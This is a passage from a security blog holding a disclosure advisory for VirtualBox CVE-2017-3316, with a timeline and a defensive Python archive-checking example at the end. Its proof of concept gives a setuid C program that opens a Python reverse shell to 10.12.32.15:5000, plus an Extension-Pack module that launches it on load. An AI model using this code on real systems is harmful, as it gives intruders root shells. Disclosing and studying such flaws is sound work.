href="https://tech.feedyourhead.at/content/openelec-remote-code-execution-vulnerability-through-man-in-the-middle">https://tech.feedyourhead.at/content/openelec-remote-code-execution-vulnerability-through-man-in-the-middle</a>)</p> </div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">Mar 03 2017</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/openelec" hreflang="en">OpenElec</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/security" hreflang="en">Security</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/taxonomy/term/107" hreflang="en">CVE</a></div> </div> </div> Fri, 03 Mar 2017 21:17:42 +0000 Hoti 231 at https://tech.feedyourhead.at Privilege Escalation in VirtualBox (CVE-2017-3316) https://tech.feedyourhead.at/content/privilege-escalation-in-virtualbox-cve-2017-3316 <span class="field field--name-title field--type-string field--label-hidden">Privilege Escalation in VirtualBox (CVE-2017-3316)</span> <div class="clearfix text-formatted field field--name-body 
field--type-text-with-summary field--label-hidden field__item"><h3>Overview</h3> <ul> <li>System affected: VirtualBox</li> <li>Software version: prior to 5.0.32, prior to 5.1.14</li> <li>User interaction: required</li> <li>Impact: a man-in-the-middle could infiltrate an Extension-Pack update to gain a root shell</li> </ul> <h3>Detailed description</h3> <p>In my research on the update mechanisms of open-source software I found vulnerabilities in Oracle's VirtualBox. It is possible to compromise a system behind a firewall by infiltrating the updates of Extension-Packs because of the following flaws:</p> <ol> <li>The Extension-Pack is updated via HTTP instead of HTTPS. Extension-Packs are not signed, so a man-in-the-middle could send his own Extension-Pack (with malicious code included) to the target instead of the regular update. The code would be executed with user permissions. I reported this bug to Oracle, but I think someone else discovered and reported it before. This bug also affects VirtualBox prior to 5.0.32 and prior to 5.1.14. I don't know the CVE.</li> <li>CVE-2017-3316: there is a privilege escalation bug in the downloader of VirtualBox. Extension-Packs are tar archives, and tar archives preserve file permissions. A man-in-the-middle could therefore include an executable with the setuid bit set in the Extension-Pack. When the victim downloads the Extension-Pack, it is stored with owner root and without the permissions of the contained binaries being checked. 
This bug affects VirtualBox prior to 5.0.32 and prior to 5.1.14.</li> </ol> <h3>Proof-Of-Concept</h3> <p>The executable built from the following code is placed in the Extension-Pack archive under <em>linux.amd64/evil</em> with the <strong>setuid</strong> bit set.</p> <div class="geshifilter"><pre class="c geshifilter-c" style="font-family:monospace;">/* evil.c (executable with the reverse shell) */
#include &lt;unistd.h&gt;

int main(void)
{
    /* Effective because the archive installs this binary root-owned with setuid. */
    setuid(0);
    execl("/usr/bin/python", "python", "-c",
          "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.12.32.15\",5000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\",\"-i\"]);",
          NULL);
    return 0;
}</pre></div> <p>Next, the VirtualBox sources are downloaded and the following code is placed under src/VBox/ExtPacks/Evil/VBoxEvilMain.cpp:</p> <div class="geshifilter"><pre class="c geshifilter-c" style="font-family:monospace;">/* $Id: VBoxEvilMain.cpp $ */
/** @file
 * Evil main module.
 */

/*
 * Copyright (C) 2010-2016 Oracle Corporation
 *
 * Permission is hereby granted, free of charge, to any person
 * obtaining a copy of this software and associated documentation
 * files (the "Software"), to deal in the Software without
 * restriction, including without limitation the rights to use,
 * copy, modify, merge, publish, distribute, sublicense, and/or sell
 * copies of the Software, and to permit persons to whom the
 * Software is furnished to do so, subject to the following
 * conditions:
 *
 * The above copyright notice and this permission notice shall be
 * included in all copies or substantial portions of the Software.
 *
 * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
 * EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
 * OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
 * NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
 * HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
 * WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
 * FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
 * OTHER DEALINGS IN THE SOFTWARE.
 */

#include &lt;VBox/ExtPack/ExtPack.h&gt;

#include &lt;VBox/err.h&gt;
#include &lt;VBox/version.h&gt;
#include &lt;VBox/vmm/cfgm.h&gt;
#include &lt;iprt/string.h&gt;
#include &lt;iprt/param.h&gt;
#include &lt;iprt/path.h&gt;
#include &lt;unistd.h&gt;


static PCVBOXEXTPACKHLP g_pHlp;

static const VBOXEXTPACKREG g_vboxEvilExtPackReg =
{
    VBOXEXTPACKREG_VERSION,
    /* .uVBoxFullVersion = */   VBOX_FULL_VERSION,
    /* .pfnInstalled = */       NULL,
    /* .pfnUninstall = */       NULL,
    /* .pfnVirtualBoxReady = */ NULL,
    /* .pfnConsoleReady = */    NULL,
    /* .pfnUnload = */          NULL,
    /* .pfnVMCreated = */       NULL,
    /* .pfnVMConfigureVMM = */  NULL,
    /* .pfnVMPowerOn = */       NULL,
    /* .pfnVMPowerOff = */      NULL,
    /* .pfnQueryObject = */     NULL,
    /* .pfnReserved1 = */       NULL,
    /* .pfnReserved2 = */       NULL,
    /* .pfnReserved3 = */       NULL,
    /* .pfnReserved4 = */       NULL,
    /* .pfnReserved5 = */       NULL,
    /* .pfnReserved6 = */       NULL,
    /* .u32Reserved7 = */       0,
    VBOXEXTPACKREG_VERSION
};

/** @callback_method_impl{FNVBOXEXTPACKREGISTER} */
extern "C" DECLEXPORT(int) VBoxExtPackRegister(PCVBOXEXTPACKHLP pHlp, PCVBOXEXTPACKREG *ppReg, PRTERRINFO pErrInfo)
{
    /* PoC addition: run the setuid helper shipped in the archive as soon as the module is loaded. */
    pid_t pid = fork();
    if (pid == 0) {
        execl("/usr/lib/virtualbox/ExtensionPacks/Oracle_VM_VirtualBox_Extension_Pack/linux.amd64/evil", "evil", NULL);
    }

    /*
     * Check the VirtualBox version.
     */
    if (!VBOXEXTPACK_IS_VER_COMPAT(pHlp-&gt;u32Version, VBOXEXTPACKHLP_VERSION))
        return RTErrInfoSetF(pErrInfo, VERR_VERSION_MISMATCH,
                             "Helper version mismatch - expected %#x got %#x",
                             VBOXEXTPACKHLP_VERSION, pHlp-&gt;u32Version);
    if (   VBOX_FULL_VERSION_GET_MAJOR(pHlp-&gt;uVBoxFullVersion) != VBOX_VERSION_MAJOR
        || VBOX_FULL_VERSION_GET_MINOR(pHlp-&gt;uVBoxFullVersion) != VBOX_VERSION_MINOR)
        return RTErrInfoSetF(pErrInfo, VERR_VERSION_MISMATCH,
                             "VirtualBox version mismatch - expected %u.%u got %u.%u",
                             VBOX_VERSION_MAJOR, VBOX_VERSION_MINOR,
                             VBOX_FULL_VERSION_GET_MAJOR(pHlp-&gt;uVBoxFullVersion),
                             VBOX_FULL_VERSION_GET_MINOR(pHlp-&gt;uVBoxFullVersion));

    /*
     * We're good, save input and return the registration structure.
     */
    g_pHlp = pHlp;
    *ppReg = &amp;g_vboxEvilExtPackReg;

    return VINF_SUCCESS;
}</pre></div> <p>After compiling, this Extension-Pack module is placed in the archive under linux.amd64/VBoxEvilMain.so. ExtPack.xml also has to be modified so that the evil module is loaded:</p> <div class="geshifilter"><pre class="xml geshifilter-xml" style="font-family:monospace;">&lt;?xml version="1.0"?&gt;
&lt;VirtualBoxExtensionPack version="1.0" xmlns="http://www.virtualbox.org/VirtualBoxExtensionPack"&gt;
    &lt;Name&gt;Oracle VM VirtualBox Extension Pack&lt;/Name&gt;
    &lt;Description&gt;USB 2.0 and USB 3.0 Host Controller, Host Webcam, VirtualBox RDP, PXE ROM, Disk Encryption.&lt;/Description&gt;
    &lt;Version revision="112026"&gt;5.1.10&lt;/Version&gt;
    &lt;MainModule&gt;VBoxEvilMain&lt;/MainModule&gt;
    &lt;VRDEModule&gt;VBoxVRDP&lt;/VRDEModule&gt;
    &lt;ShowLicense/&gt;
&lt;/VirtualBoxExtensionPack&gt;</pre></div> <p>Note: to make this Extension-Pack valid, the checksums of all files have to be added to ExtPack.manifest. The victim is asked for the root password during the update. 
If the attacker delivers this malicious Extension-Pack, a reverse shell running as root is started.</p> <h3>Timeline</h3> <p>This bug was reported in December. Oracle answered on the same day and gave status reports regularly. <a href="http://www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.html">They released a patch on January 17th</a>.</p> <h3>Credits</h3> <p>CVE-2017-3316 was discovered by Wolfgang Hotwagner (https://tech.feedyourhead.at/content/privilege-escalation-in-virtualbox-cve-2017-3316)</p> </div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">Jan 26 2017</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/security" hreflang="en">Security</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/virtualization" hreflang="en">Virtualization</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/taxonomy/term/107" hreflang="en">CVE</a></div> </div> </div> Thu, 26 Jan 2017 21:58:38 +0000 Hoti 226 at https://tech.feedyourhead.at
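Both advisories above fail at the same point: an update archive fetched over plain HTTP with no signature, whose own contents are then trusted (the SYSTEM.md5 shipped inside the OpenElec tarball, the mode bits preserved by the Extension-Pack tar). The following is an added example, not code from either advisory or from the OpenElec or VirtualBox projects, showing with constructed archives why the in-band checksum cannot detect a swapped package, how a digest pinned out of band does, and how an installer can flag or strip setuid members before extracting as root; every archive, path and file content in it is constructed.

```python
# Added example (not from either advisory): checks an update client should run
# on a downloaded tar archive before installing it. All data is constructed.
import hashlib
import io
import tarfile

SETUID, SETGID = 0o4000, 0o2000


def build_tar(members):
    """Constructed helper: in-memory tar from (path, data, mode) tuples."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for path, data, mode in members:
            info = tarfile.TarInfo(path)
            info.size = len(data)
            info.mode = mode  # tar keeps mode bits, setuid included
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def in_band_md5_ok(tar_bytes):
    """OpenElec-style check: target/SYSTEM against the SYSTEM.md5 shipped in
    the same unsigned archive. Whoever swaps the archive rewrites this too."""
    with tarfile.open(fileobj=io.BytesIO(tar_bytes)) as tar:
        system = tar.extractfile("target/SYSTEM").read()
        md5_line = tar.extractfile("target/SYSTEM.md5").read().decode()
    return md5_line.split()[0] == hashlib.md5(system).hexdigest()


def out_of_band_ok(tar_bytes, pinned_sha256):
    """Digest obtained over a trusted channel (a signature check, not modelled
    here, serves the same purpose): detects a swapped archive."""
    return hashlib.sha256(tar_bytes).hexdigest() == pinned_sha256


def audit_members(tar_bytes):
    """Findings an installer must refuse before extracting as root."""
    findings = []
    with tarfile.open(fileobj=io.BytesIO(tar_bytes)) as tar:
        for m in tar.getmembers():
            if m.name.startswith("/") or ".." in m.name.split("/"):
                findings.append((m.name, "path escapes target directory"))
            if m.issym() or m.islnk():
                findings.append((m.name, "link inside archive"))
            if m.isdev():
                findings.append((m.name, "device node"))
            if m.isfile() and m.mode & (SETUID | SETGID):
                findings.append((m.name, "setuid/setgid bit set"))
    return findings


def sanitized_modes(tar_bytes):
    """Modes to apply on extraction: setuid/setgid stripped (path -> mode)."""
    with tarfile.open(fileobj=io.BytesIO(tar_bytes)) as tar:
        return {m.name: m.mode & ~(SETUID | SETGID) for m in tar.getmembers()}


def md5_file(data):
    """Constructed SYSTEM.md5 content in md5sum's output format."""
    return (hashlib.md5(data).hexdigest() + "  target/SYSTEM\n").encode()


def demo():
    # Constructed OpenElec-style update: SYSTEM image plus in-band md5 file.
    image = b"squashfs image (constructed)"
    good = build_tar([("target/SYSTEM", image, 0o644),
                      ("target/SYSTEM.md5", md5_file(image), 0o644)])
    pinned = hashlib.sha256(good).hexdigest()  # learned out of band
    # Same archive after a man-in-the-middle swap: new image, md5 regenerated.
    swapped = b"squashfs image with an extra start script (constructed)"
    evil = build_tar([("target/SYSTEM", swapped, 0o644),
                      ("target/SYSTEM.md5", md5_file(swapped), 0o644)])
    # Constructed Extension-Pack-style archive carrying a setuid member.
    extpack = build_tar([("ExtPack.xml", b"<VirtualBoxExtensionPack/>", 0o644),
                         ("linux.amd64/evil", b"\x7fELF (constructed)", 0o4755)])
    return {
        "in_band_good": in_band_md5_ok(good),         # True
        "in_band_evil": in_band_md5_ok(evil),         # True: check is blind
        "pinned_good": out_of_band_ok(good, pinned),  # True
        "pinned_evil": out_of_band_ok(evil, pinned),  # False: swap detected
        "extpack_findings": audit_members(extpack),
        "extpack_modes": sanitized_modes(extpack),
    }
```

Run `demo()` to see both outcomes side by side: the in-band md5 accepts the swapped archive, the pinned digest rejects it, and the Extension-Pack archive is reported for its setuid member with the mode the installer should apply instead.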